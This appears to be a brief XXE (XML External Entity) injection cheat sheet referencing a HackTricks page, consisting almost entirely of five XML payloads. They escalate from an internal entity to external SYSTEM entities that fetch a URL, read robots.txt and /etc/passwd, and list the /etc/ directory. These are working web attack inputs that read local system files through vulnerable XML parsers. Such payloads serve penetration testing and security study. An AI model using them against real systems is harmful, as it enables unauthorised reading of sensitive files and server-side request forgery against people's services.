XML External Entity (XXE)
- https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
<?xml version="1.0"?>
<!DOCTYPE change-log[
<!ENTITY myName "Michal">
<!ENTITY mySurname "Szalkowski">
]>
<change-log>
<text>&myName; &mySurname;</text>
</change-log>
<?xml version="1.0"?>
<!DOCTYPE
change-log [
<!ENTITY systemEntity SYSTEM "http://example.com/feed/">
]
>
<change-log>
<text>&systemEntity;</text>;
</change-log>
<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM "robots.txt">]>
<change-log>
<text>&systemEntity;</text>;
</change-log>
<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM "/etc/passwd">]>
<change-log>
<text>&systemEntity;</text>;
</change-log>
<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM 'file:///etc/'>]>
<change-log>
<text>&systemEntity;</text>;
</change-log>